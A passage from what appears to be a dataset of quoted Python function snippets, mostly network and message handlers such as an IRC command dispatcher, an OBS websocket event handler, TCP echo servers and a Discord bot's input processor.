not client.ident.registered and func_name not in self.allowed_unregistered_cmds:\n raise UnregisteredDisallow()\n func(client, *args)\n\n except UnknownCommand as e:\n log.info(f'{client} *** Unknown command {e} ***')\n client.send_as_server(ERR_UNKNOWNCOMMAND, f'{client.ident.nick} {e} :Unknown command')\n\n except TypeError as e:\n # A TypeError calling func() means the arguments were incorrect\n if str(e).startswith(func_name + '()'):\n client.send_as_server(ERR_NEEDSMOREPARAMS, f'{client.ident.nick} {func_name} :{e}')\n # Or it could be an exception from the function execution itself\n else:\n raise\n\n except UnregisteredDisallow as e:\n client.send_as_server(ERR_NOTREGISTERED, f'* :You have not registered')", "def handle_io_event(self, data):\n getattr(\n self,\n 'control_{}'.format(self.model)\n )(data['action'])\n self.update_serverside_status({\n 'action': data['action'], 'event_id': data['event_id']\n })", "def command(self, value):\n for ii in range(0, len(exposure_mode_names)):\n if value == exposure_mode_names[ii]: break\n self.tcp_comms.tcp_params.exposureMode = ii\n self.tcp_comms.send_exposure_mode(self.tcp_comms.tcp_params.exposureMode)", "def dataReceived(self, data):", "def handle(self):\r\n # self.request is the TCP socket connected to the client\r\n # read the incoming command\r\n request = self.request.recv(1024).strip()\r\n # write to the queue waiting to be processed by the server\r\n INPUT_QUEUE.put(request)\r\n # wait for the server answer in the output queue\r\n response = OUTPUT_QUEUE.get(timeout=5.0)\r\n # send back the answer\r\n self.request.send(response)", "def receive(self, sender, sessionID, data):\n if data[0] == \"PULL\" or data[0] == \"PUSH\" or data[0] == \"PUSH2\":\n self.sessions[sessionID].ongoingRequest = data\n self.serviceRequests()\n\n elif data[0] == \"DATA\":\n self.incomingBuffer[data[1]] = data[2]\n self.integrate()", "async def process_data(self, received):\n\t\treceived_json = utilities.is_json(received)\n\n\t\tif not received_json:\n\t\t\traise exceptions.ClientError('INVALID_JSON')\n\n\t\taction = received_json.get('c').upper()\n\t\tdata = received_json.get('d')\n\n\t\tlog.info('%s: %s' % (\n\t\t\tself.session,\n\t\t\taction\n\t\t))\n\n\t\tif not data and action not in constants.DATALESS:\n\t\t\traise exceptions.ClientError('NO_DATA')\n\n\t\tif action == 'JOIN_GROUP':\n\t\t\tawait self.join(data.get('group'))\n\t\telif action == 'LEAVE_GROUP':\n\t\t\tawait self.leave()\n\t\telif action == 'EDIT_USER':\n\t\t\tawait self.edit(name=data.get('name'))\n\t\telif action == 'EDIT_GAME':\n\t\t\tif self.group != None:\n\t\t\t\tself.group.game.edit(\n\t\t\t\t\tround_count=data.get('round_count'),\n\t\t\t\t\twordlist=data.get('wordlist')\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\traise exceptions.ClientError('NO_GROUP')\n\t\telif action == 'GAME_START':\n\t\t\tawait self.group.start_game()\n\t\telif action == 'CHAT_MESSAGE':\n\t\t\tawait self.message(data.get('message'))\n\t\telif action == 'CLOSE_CONNECTION':\n\t\t\tself.active = 0", "def __call__(self,data):\n\n log.debug('got data: %s' % (len(data)))\n\n # if we don't have args yet, these must be them\n if not self.args:\n self.parse_args(data)\n\n else:\n # we've already got args, must\n # be a message\n self.handle_send(data)", "def _receive(self, what, address, **kwargs):\n\n print('_receive: please override me.')", "def on_data(self, session, byte_data):\n try:\n str_data = to_str(byte_data).strip()\n\n for cmd in str_data.split(\";\"):\n args = [\n val for val in [\n val.strip() for val in cmd.split(self._seps)\n ] if val]\n\n if not args:\n continue\n\n if not self.on_command(session, args):\n return False\n\n self.put_prompt(session)\n return True\n\n except Exception as exc: # pylint: disable=broad-except\n LOGGER.error(traceback.format_exc())\n self.reply_text(session, \"NG:Error occurred (%s)\" % str(exc))\n return False", "def client_request(self, evt):\n threads.deferToThread(self.cli_db.accept, evt)", "def data_received(self, data):\n pass", "def __async_read_callback(self, data, err) -> None:\n if err != 0:\n logging.info('async_read (1): disconnected')\n self.close()\n elif not data:\n logging.info('async_read (2): disconnected')\n self.close()\n elif self.__is_active:\n # Push incoming data through Telnet Option Parser.\n self.receive_buffer.clear()\n for byte in data:\n # Add parsed text data\n return_byte = self.__telnet_parser.iac_sniffer(bytes([byte]))\n if return_byte is not None:\n # logging.info('byte received: {byte}'.format(byte=return_byte))\n # bytes_parsed = bytes_parsed + return_byte\n self.receive_buffer.append(return_byte)\n\n # Data other than Telnet Options, then send back to client. or push through system!!\n if len(self.receive_buffer) > 0:\n # This should now be pushed through for\n # Input on the STATE instead of echoed back!\n logging.info(\"Echo %s\", self.receive_buffer)\n self.async_write(b''.join(self.receive_buffer))\n\n # Ready for next set of incoming data\n self.wait_for_async_data()", "def process_command(self, command):\r\n if self.visprotocol is not None:\r\n _LOGGER.info(\"client process_command called {0} type is {1}\".format(command, type(self.visprotocol))) \r\n self.visprotocol.process_command(command)\r\n else:\r\n _LOGGER.error(\"[VisonicClient] The pyvisonic command is None\")", "def process(self, data, channel = None):\n\t\traise NotImplementException()", "def OnCommand(self, data, onResult=LogAck):\r\n\t\td = self.perspective.callRemote(\"Command\", data)\r\n\t\td.addCallback(onResult)\r\n\t\td.addErrback(self.OnError)", "def handle(self) -> None:\r\n\r\n if self.data.get(\"message-id\") != None:\r\n if self.data[\"status\"] == \"error\":\r\n print(self.data[\"error\"])\r\n return\r\n else:\r\n requestData = self.obs.pendingResponses.pop(self.data[\"message-id\"])\r\n request = requestData[\"request-type\"]\r\n #Requests as of version 4.8.0\r\n\r\n #General\r\n if request == \"GetVersion\":\r\n pass\r\n\r\n elif request == \"GetAuthRequired\":\r\n if self.data[\"authRequired\"]:\r\n secret_string: str = self.obs.password + self.data[\"salt\"]\r\n secret_hash: sha256 = sha256(secret_string.encode(\"utf-8\"))\r\n secret: bytes = b64encode(secret_hash.digest())\r\n\r\n response_string: str = secret.decode(\"utf-8\") + self.data[\"challenge\"]\r\n response_hash: sha256 = sha256(response_string.encode(\"utf-8\"))\r\n response: bytes = b64encode(response_hash.digest())\r\n\r\n self.obs.requests.append({\r\n \"type\": \"Authenticate\",\r\n \"auth\": response.decode(\"utf-8\")})\r\n\r\n else:\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"Authenticate\":\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"SetHeartbeat\":\r\n #To be removed in 5.0.0\r\n pass\r\n\r\n elif request == \"SetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetStats\":\r\n pass\r\n\r\n elif request == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n elif request == \"GetVideoInfo\":\r\n pass\r\n\r\n elif request == \"OpenProjector\":\r\n pass\r\n\r\n elif request == \"TriggerHotkeyByName\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"TriggerHotkeyBySequence\":\r\n #Unreleased\r\n pass\r\n\r\n #Media Control\r\n elif request == \"PlayPauseMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"RestartMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StopMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"NextMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"PreviousMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaDuration\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"SetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"ScrubMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaState\":\r\n #Unreleased\r\n pass\r\n\r\n #Sources\r\n\r\n elif request == \"GetMediaSourcesList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSourcesList\":\r\n pass\r\n\r\n elif request == \"GetSourceTypesList\":\r\n pass\r\n\r\n elif request == \"GetVolume\":\r\n pass\r\n\r\n elif request == \"SetVolume\":\r\n pass\r\n\r\n elif request == \"GetMute\":\r\n pass\r\n\r\n elif request == \"SetMute\":\r\n pass\r\n\r\n elif request == \"ToggleMute\":\r\n pass\r\n\r\n elif request == \"GetAudioActive\":\r\n pass\r\n\r\n elif request == \"SetSourceName\":\r\n pass\r\n\r\n elif request == \"SetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSourceSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceSettings\":\r\n pass\r\n\r\n elif request == \"GetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"SetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"GetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"SetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"GetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"SetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"GetSpecialSources\":\r\n pass\r\n\r\n elif request == \"GetSourceFilters\":\r\n source = self.obs.getSource(requestData[\"sourceName\"])\r\n if source != None:\r\n for _filter in self.data[\"filters\"]:\r\n source.addFilter(_filter) #type: ignore\r\n\r\n elif request == \"GetSourceFilterInfo\":\r\n pass\r\n\r\n elif request == \"AddFilterToSource\":\r\n pass\r\n\r\n elif request == \"RemoveFilterFromSource\":\r\n pass\r\n\r\n elif request == \"ReorderSourceFilter\":\r\n pass\r\n\r\n elif request == \"MoveSourceFilter\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterVisibility\":\r\n pass\r\n \r\n elif request == \"GetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"SetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"TakeSourceScreenshot\":\r\n pass\r\n\r\n #Outpute\r\n elif request == \"ListOutputs\":\r\n pass\r\n\r\n elif request == \"GetOutputInfo\":\r\n pass\r\n\r\n elif request == \"StartOutput\":\r\n pass\r\n\r\n elif request == \"StopOutput\":\r\n pass\r\n\r\n #Profiles\r\n elif request == \"SetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"GetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"ListProfiles\":\r\n pass\r\n\r\n #Recording\r\n elif request == \"GetRecordingStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopRecording\":\r\n pass\r\n\r\n elif request == \"StartRecording\":\r\n pass\r\n\r\n elif request == \"StopRecording\":\r\n pass\r\n\r\n elif request == \"PauseRecording\":\r\n pass\r\n\r\n elif request == \"ResumeRecording\":\r\n pass\r\n\r\n elif request == \"SetRecordingFolder\":\r\n pass\r\n\r\n elif request == \"GetRecordingFolder\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif request == \"GetReplayBufferStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StartReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"SaveReplayBuffer\":\r\n pass\r\n\r\n #Scene Collections\r\n elif request == \"SetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"GetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"ListSceneCollections\":\r\n pass\r\n\r\n #Scene Items\r\n elif request == \"GetSceneItemList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"SetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"ResetSceneItem\":\r\n pass\r\n\r\n elif request == \"SetSceneItemRender\":\r\n pass\r\n\r\n elif request == \"SetSceneItemPosition\":\r\n pass\r\n\r\n elif request == \"SetSceneItemTransform\":\r\n pass\r\n\r\n elif request == \"SetSceneItemCrop\":\r\n pass\r\n\r\n elif request == \"DeleteSceneItem\":\r\n pass\r\n\r\n elif request == \"AddSceneItem\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"DuplicateSceneItem\":\r\n pass\r\n\r\n #Scenes\r\n elif request == \"SetCurrentScene\":\r\n pass\r\n\r\n elif request == \"GetCurrentScene\":\r\n self.obs.setCurrentScene(self.data[\"name\"])\r\n\r\n elif request == \"GetSceneList\":\r\n for scene in self.data[\"scenes\"]:\r\n self.obs.addScene(scene)\r\n self.obs.setCurrentScene(self.data[\"current-scene\"])\r\n\r\n elif request == \"CreateScene\":\r\n pass\r\n\r\n elif request == \"ReorderSceneItems\":\r\n pass\r\n\r\n elif request == \"SetSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"RemoveSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"GetSceneTransitionOverride\":\r\n pass\r\n\r\n #Streaming\r\n elif request == \"GetStreamingStatus\":\r\n pass\r\n\r\n elif request == \"StartStopStreaming\":\r\n pass\r\n\r\n elif request == \"StartStreaming\":\r\n pass\r\n\r\n elif request == \"StopStreaming\":\r\n pass\r\n\r\n elif request == \"SetStreamSettings\":\r\n pass\r\n\r\n elif request == \"GetStreamSettings\":\r\n pass\r\n\r\n elif request == \"SaveStreamSettings\":\r\n pass\r\n\r\n elif request == \"SendCaptions\":\r\n pass\r\n\r\n #Studio Mode\r\n elif request == \"GetStudioModeStatus\":\r\n pass\r\n\r\n elif request == \"GetPreviewScene\":\r\n pass\r\n\r\n elif request == \"SetPreviewScene\":\r\n pass\r\n\r\n elif request == \"TransitionToProgram\":\r\n pass\r\n\r\n elif request == \"EnableStudioMode\":\r\n pass\r\n\r\n elif request == \"DisableStudioMode\":\r\n pass\r\n\r\n elif request == \"ToggleStudioMode\":\r\n pass\r\n\r\n #Transitions\r\n elif request == \"GetTransitionList\":\r\n pass\r\n\r\n elif request == \"GetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionPosition\":\r\n pass\r\n\r\n else:\r\n print(f\"Unhandled response of type {request} and data {self.data}.\")\r\n\r\n \r\n\r\n else:\r\n event: str = self.data[\"update-type\"]\r\n #Events as of 4.8.0\r\n\r\n #Scenes\r\n if event == \"SwitchScenes\":\r\n self.obs.setCurrentScene(self.data[\"scene-name\"])\r\n\r\n elif event == \"ScenesChanged\":\r\n #self.obs.purgeScenes()\r\n pass\r\n\r\n elif event == \"SceneCollectionChanged\":\r\n pass\r\n\r\n elif event == \"SceneCollectionListChanged\":\r\n pass\r\n\r\n #Transitions\r\n elif event == \"SwitchTransition\":\r\n pass\r\n\r\n elif event == \"TransitionListChanged\":\r\n pass\r\n\r\n elif event == \"TransitionDurationChanged\":\r\n pass\r\n\r\n elif event == \"TransitionBegin\":\r\n pass\r\n\r\n elif event == \"TransitionEnd\":\r\n pass\r\n\r\n elif event == \"TransitionVideoEnd\":\r\n pass\r\n\r\n #Profiles\r\n elif event == \"ProfileChanged\":\r\n pass\r\n\r\n elif event == \"ProfileListChanged\":\r\n pass\r\n\r\n #Streaming\r\n elif event == \"StreamStarting\":\r\n pass\r\n\r\n elif event == \"StreamStarted\":\r\n pass\r\n\r\n elif event == \"StreamStopping\":\r\n pass\r\n\r\n elif event == \"StreamStopped\":\r\n pass\r\n\r\n elif event == \"StreamStatus\":\r\n pass\r\n\r\n #Recording\r\n elif event == \"RecordingStarting\":\r\n pass\r\n\r\n elif event == \"RecordingStarted\":\r\n pass\r\n\r\n elif event == \"RecordingStopping\":\r\n pass\r\n\r\n elif event == \"RecordingStopped\":\r\n pass\r\n\r\n elif event == \"RecordingPaused\":\r\n pass\r\n\r\n elif event == \"RecordingResumed\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif event == \"ReplayStarting\":\r\n pass\r\n\r\n elif event == \"ReplayStarted\":\r\n pass\r\n\r\n elif event == \"ReplayStopping\":\r\n pass\r\n\r\n elif event == \"ReplayStopped\":\r\n pass\r\n\r\n #Other\r\n elif event == \"Exiting\":\r\n pass\r\n\r\n #General\r\n elif event == \"Heartbeat\":\r\n pass\r\n\r\n elif event == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n #Sources\r\n elif event == \"SourceCreated\":\r\n pass\r\n\r\n elif event == \"SourceDestroyed\":\r\n pass\r\n\r\n elif event == \"SourceVolumeChanged\":\r\n pass\r\n\r\n elif event == \"SourceMuteStateChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioDeactivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioActivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioSyncOffsetChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioMixersChanged\":\r\n pass\r\n\r\n elif event == \"SourceRenamed\":\r\n pass\r\n\r\n elif event == \"SourceFilterAdded\":\r\n pass\r\n\r\n elif event == \"SourceFilterRemoved\":\r\n pass\r\n\r\n elif event == \"SourceFilterVisibilityChanged\":\r\n source = self.obs.getSource(self.data[\"sourceName\"])\r\n if source != None:\r\n _filter = source.getFilter(self.data[\"filterName\"]) #type: ignore\r\n if _filter != None:\r\n _filter.setVisible(self.data[\"filterEnabled\"]) #type: ignore\r\n\r\n elif event == \"SourceFiltersReordered\":\r\n pass\r\n\r\n #Media\r\n elif event == \"MediaPlaying\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPaused\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaRestarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStopped\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaNext\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPrevious\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaEnded\":\r\n #Unreleased\r\n pass\r\n\r\n #Scene Items\r\n elif event == \"SceneItemOrderChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemAdded\":\r\n pass\r\n\r\n elif event == \"SceneItemRemoved\":\r\n pass\r\n\r\n elif event == \"SceneItemVisibilityChanged\":\r\n scene = self.obs.getScene(self.data[\"scene-name\"])\r\n if scene != None:\r\n source = scene.getSource(self.data[\"item-name\"]) #type: ignore\r\n if source != None:\r\n source.setVisible(self.data[\"item-visible\"]) #type: ignore\r\n \r\n\r\n elif event == \"SceneItemLockChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemTransformChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemSelected\":\r\n pass\r\n\r\n elif event == \"SceneItemDeselected\":\r\n pass\r\n\r\n #Studio Mode\r\n elif event == \"PreviewSceneChanged\":\r\n pass\r\n\r\n elif event == \"StudioModeSwitched\":\r\n pass\r\n\r\n #Unhandled Events\r\n else:\r\n print(\"Unhandled event with data: \" + str(self.data))", "def server_do(self,input, connstream):\r\n pass", "def _handle_request(self, info, desired=None):\r\n debug_print('%s request:' % info.name)\r\n\r\n editor = info.editor\r\n if ((not editor.is_python_like())\r\n or sourcecode.is_keyword(info.obj)\r\n or editor.in_comment_or_string()):\r\n desired = 'fallback'\r\n\r\n self.pending = (info, desired)\r\n if not self.busy:\r\n self._handle_pending()", "def _callback_main(self, data):\n alpha = data.data\n self.command_synergy(alpha)", "def _on_read(self, line):\n # Some game logic (or magic)\n line = line.strip()\n logger.info(\"RCV> %s\", line)\n if not line:\n self.stream.close()\n return\n\n self.stream.write(\"echo: %s\\n\" % line)\n\n # Wait for further input on this connection\n self.wait()", "def _ngl_handle_msg(self, widget, msg, buffers):\n self._ngl_msg = msg\n\n msg_type = self._ngl_msg.get('type')\n if msg_type == 'request_frame':\n self.frame += self.player.step\n if self.frame >= self.count:\n self.frame = 0\n elif self.frame < 0:\n self.frame = self.count - 1\n elif msg_type == 'repr_parameters':\n data_dict = self._ngl_msg.get('data')\n name = data_dict.pop('name') + '\\n'\n selection = data_dict.get('sele', '') + '\\n'\n # json change True to true\n data_dict_json = json.dumps(data_dict).replace(\n 'true', 'True').replace('false', 'False')\n data_dict_json = data_dict_json.replace('null', '\"null\"')\n\n if self.player.widget_repr is not None:\n # TODO: refactor\n repr_name_text = widget_utils.get_widget_by_name(\n self.player.widget_repr, 'repr_name_text')\n repr_selection = widget_utils.get_widget_by_name(\n self.player.widget_repr, 'repr_selection')\n repr_name_text.value = name\n repr_selection.value = selection\n elif msg_type == 'request_loaded':\n if not self.loaded:\n # trick to trigger observe loaded\n # so two viewers can have the same representations\n self.loaded = False\n self.loaded = msg.get('data')\n elif msg_type == 'request_repr_dict':\n # update _repr_dict will trigger other things\n # see _handle_repr_dict_changed\n self._ngl_repr_dict = self._ngl_msg.get('data')\n elif msg_type == 'stage_parameters':\n self._ngl_full_stage_parameters = msg.get('data')\n elif msg_type == 'async_message':\n if msg.get('data') == 'ok':\n self._event.set()", "def process_command(self, command):\r\n if self.visprotocol is not None:\r\n _LOGGER.debug(\"client process_command called %s type is %s\", command, type(self.visprotocol))\r\n self.visprotocol.process_command(command)\r\n else:\r\n _LOGGER.warning(\"[VisonicClient] The pyvisonic command is None\")", "def process_event(event, device_id):\n print(event)\n if event.type == EventType.ON_CONVERSATION_TURN_STARTED:\n adjustvolume('30')\n subprocess.Popen([\"aplay\", \"/opt/RPIGassistant/audio-files/Listening.wav\"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n GPIO.output(5,GPIO.HIGH)\n led.ChangeDutyCycle(100)\n print()\n\n if (event.type == EventType.ON_RESPONDING_STARTED and event.args and not event.args['is_error_response']):\n GPIO.output(5,GPIO.LOW)\n GPIO.output(6,GPIO.HIGH)\n led.ChangeDutyCycle(50)\n\n if event.type == EventType.ON_RESPONDING_FINISHED:\n GPIO.output(6,GPIO.LOW)\n GPIO.output(5,GPIO.HIGH)\n led.ChangeDutyCycle(100)\n print()\n\n if (event.type == EventType.ON_CONVERSATION_TURN_TIMEOUT):\n say(random.choice(['sorry, i did not hear what you said', \n 'sorry, i did not hear anything', \n 'pardon', \n 'sorry, have you said something?']))\n restorevolume()\n print()\n\n if (event.type == EventType.ON_NO_RESPONSE):\n restorevolume()\n print()\n\n if (event.type == EventType.ON_CONVERSATION_TURN_FINISHED and\n event.args and not event.args['with_follow_on_turn']):\n restorevolume()\n GPIO.output(5,GPIO.LOW)\n led.ChangeDutyCycle(0)\n print()\n\n if event.type == EventType.ON_DEVICE_ACTION:\n for command, params in process_device_actions(event, device_id):\n print('Do command', command, 'with params', str(params))", "def process(self, data):\n\t\tif data['action'] == '0x40':\n\t\t\tself.authenticate(data)\n\t\telse:\n\t\t\t# Protocol error\n\t\t\tstack['clients'][self.client_ident].put(1,{'type':'0x000','status':'0x001'})", "def handle(self):\n self.ip = self.client_address[0]\n self.port = self.client_address[1]\n self.connection = self.request\n\n state.addConnection(self.connection)\n\n # Loop that listens for messages from the client\n while True:\n received_string = self.connection.recv(4096)\n\n if len(received_string) == 0:\n continue\n\n # TODO: Add handling of received payload from client\n\n # Convert payload from JSON to object\n payloadToData = json.loads(received_string)\n\n # determine what request is being made\n request_handler = RequestHandler(payloadToData,\n state,\n self.connection)\n\n # execute and generate response (JSON formatted)\n jsonResponse = request_handler.callHandler()\n\n if not jsonResponse == 'BROADCAST':\n # send response\n self.connection.send(bytes(jsonResponse, \"ascii\"))", "def receive(self, data):\n raise NotImplementedError", "def receive(self, data):\n raise NotImplementedError", "def _process(self):\n\n while True:\n try:\n sockets = [self.master_fd]\n if self.sock:\n sockets.append(self.sock)\n # Don't handle user input while a side command is running.\n if len(self.filter) == 1:\n sockets.append(pty.STDIN_FILENO)\n rfds, _, _ = select.select(sockets, [], [], 0.25)\n except select.error as ex:\n if ex[0] == errno.EAGAIN: # Interrupted system call.\n continue\n raise\n\n if not rfds:\n self._timeout()\n else:\n # Handle one packet at a time to mitigate the side channel\n # breaking into user input.\n if self.master_fd in rfds:\n data = os.read(self.master_fd, 1024)\n self.master_read(data)\n elif pty.STDIN_FILENO in rfds:\n data = os.read(pty.STDIN_FILENO, 1024)\n self.stdin_read(data)\n elif self.sock in rfds:\n data, self.last_addr = self.sock.recvfrom(65536)\n if data[-1] == b'\\n':\n self.log(\"WARNING: the command ending with <nl>. \"\n \"The StreamProxy filter known to fail.\")\n self.log(\"Got command '%s'\" % data.decode('utf-8'))\n command = self.filter_command(data)\n self.log(\"Translated command '{}'\"\n .format(command.decode('utf-8')))\n if command:\n self.write_master(command)\n self.write_master(b'\\n')", "def process(self):\n try:\n (data, peer) = self._socket.recvfrom(1024)\n request = json.loads(data.decode())\n command = request['command']\n method = getattr(self, 'do_' + command)\n try:\n result = method(request)\n if result is not None:\n self._send_response(result, peer)\n except KeyError as exc:\n self._logger.error(\n \"missing parameter for command '%s': '%s'\",\n command, exc.args[0]\n )\n except ValueError:\n self._logger.error(\"invalid control request received\")\n except KeyError:\n self._logger.error(\"no control command specified\")\n except AttributeError:\n self._logger.error(\"unknown control command '%s'\", command)\n return []", "def read_for_explore_run(self):\n b_data = self.client_sock.recv(1024)\n if b_data!=None and len(b_data)!=0:\n if b_data!=\"GRID\": # AUTO mode in android, to avoid flush cmd\n print \"Received from Android: %s\" % b_data\n if b_data==\"explore\":\n print_msg(self.name, \"Setting \\\"explore\\\" flag\")\n self.explore_start = True\n elif b_data==\"run\":\n print_msg(self.name, \"Setting \\\"run\\\" flag\")\n self.run_start = True\n else:\n pass", "def handle(self, data):\n pass", "def outReceived(self, data):\n log.msg('got %r' % data)\n lines = (self._lineBuffer + data).split(b'\\n')\n self._lineBuffer = lines.pop(-1)\n self._linesReceived.extend(lines)\n # XXX - not strictly correct.\n # We really want onOutReceived to fire after the first 'cftp>' prompt\n # has been received. (See use in OurServerCmdLineClientTests.setUp)\n if self.onOutReceived is not None:\n d, self.onOutReceived = self.onOutReceived, None\n d.callback(data)\n self.buffer += data\n self._checkForCommand()", "def send(self, *args, **kwargs):\n if not self.paused():\n raise RuntimeError(\"Machine is not awaiting input\")\n else:\n self.args = (args, kwargs)", "def handle_user_input(self,args):\n import ipcAPI,config\n\n message = self.get_message(args)\n try:\n client = ipcAPI.ipcClient(config.SOCKET_FILE)\n\n client.send_data(message)\n\n resp = client.recv_data()\n\n print(\"{} : {}\".format(resp['status'],resp['message']))\n except:\n print(\"Error while communicating with server\")\n return False\n \n return True", "def handle_request(self):\n\t\ttry:\n\t\t\tr,w,e=select.select([self.socket],[],[], 1.0)\n\t\t\tif not r:\n\t\t\t\treturn\n\t\t\trequest, client_address=self.socket.accept()\n\t\texcept:\n\t\t\treturn\t\t\n\t\t\n\t\ttry:\n\t\t\tif self.debug:\n\t\t\t\tprint \"got request\"\n\t\t\tself.process_request(request, client_address)\n\t\texcept:\n\t\t\tself.handle_error(request, client_address)", "def handle(self):\n try:\n # Wait for data\n data = json.loads(self.request.recv(1024).decode('UTF-8').strip())\n\n # Process data\n self.process_data(data)\n\n except Exception as e:\n print(\"Exception wile receiving message: \", e)\n self.request.sendall(\n bytes(json.dumps({'return': 'error'}), 'UTF-8'))", "def async_handle_dispatch(self, *args) -> None:\n if not args:\n self.update_ha_state()\n return\n\n payload = args[0]\n if payload.get(UNIQUE_ID) != self.unique_id:\n return\n elif payload[SERVICE] == SVC_RESET_SYSTEM_MODE:\n self._call_client_api(self._device.reset_mode)\n elif payload[SERVICE] == SVC_SET_SYSTEM_MODE:\n kwargs = dict(payload[DATA])\n kwargs[\"system_mode\"] = kwargs.pop(\"mode\", None)\n until = kwargs.pop(\"duration\", None) or kwargs.pop(\"period\", None)\n kwargs[\"until\"] = (dt.now() + until) if until else None\n self._call_client_api(self._device.set_mode, **kwargs)", "def receive(self):\n pass", "def handle_data(self, data):\n if self._wait_auth:\n if len(data) != self._AUTH_LEN:\n self.force_close()\n return\n data = list(self._cipher_rx.crypt(data))\n authl = list(self._auth_data)\n if data == authl:\n self._wait_auth = False\n self._timeout = None\n self.set_number()\n else:\n self.force_close()\n elif self.remote_user:\n self.remote_user.send(self._cipher_rx.crypt(data))", "def handle(self):\n data = self.request.recv(1024)\n self.request.send(data)", "def cmd(self, data, enable):\n pass", "def data_in(self, data, **kwargs):\n action_type = data.get(\"t\", \"UNKNOWN\")\n\n if action_type == \"MESSAGE_CREATE\":\n # someone posted a message on Discord that the bot can see\n data = data[\"d\"]\n if data[\"author\"][\"id\"] == self.discord_id:\n # it's by the bot itself! disregard\n return\n message = data[\"content\"]\n channel_id = data[\"channel_id\"]\n keywords = {\"channel_id\": channel_id}\n if \"guild_id\" in data:\n # message received to a Discord channel\n keywords[\"type\"] = \"channel\"\n author = data[\"member\"][\"nick\"] or data[\"author\"][\"username\"]\n author_id = data[\"author\"][\"id\"]\n keywords[\"sender\"] = (author_id, author)\n keywords[\"guild_id\"] = data[\"guild_id\"]\n\n else:\n # message sent directly to the bot account via DM\n keywords[\"type\"] = \"direct\"\n author = data[\"author\"][\"username\"]\n author_id = data[\"author\"][\"id\"]\n keywords[\"sender\"] = (author_id, author)\n\n # pass the processed data to the server\n self.sessionhandler.data_in(self, bot_data_in=(message, keywords))\n\n elif action_type in (\"GUILD_CREATE\", \"GUILD_UPDATE\"):\n # we received the current status of a guild the bot is on; process relevant info\n data = data[\"d\"]\n keywords = {\"type\": \"guild\", \"guild_id\": data[\"id\"], \"guild_name\": data[\"name\"]}\n keywords[\"channels\"] = {\n chan[\"id\"]: {\"name\": chan[\"name\"], \"guild\": data[\"name\"]}\n for chan in data[\"channels\"]\n if chan[\"type\"] == 0\n }\n # send the possibly-updated guild and channel data to the server\n self.sessionhandler.data_in(self, bot_data_in=(\"\", keywords))\n\n elif \"DELETE\" in action_type:\n # deletes should possibly be handled separately to check for channel removal\n # for now, just ignore\n pass\n\n else:\n # send the data for any other action types on to the bot as-is for optional server-side handling\n 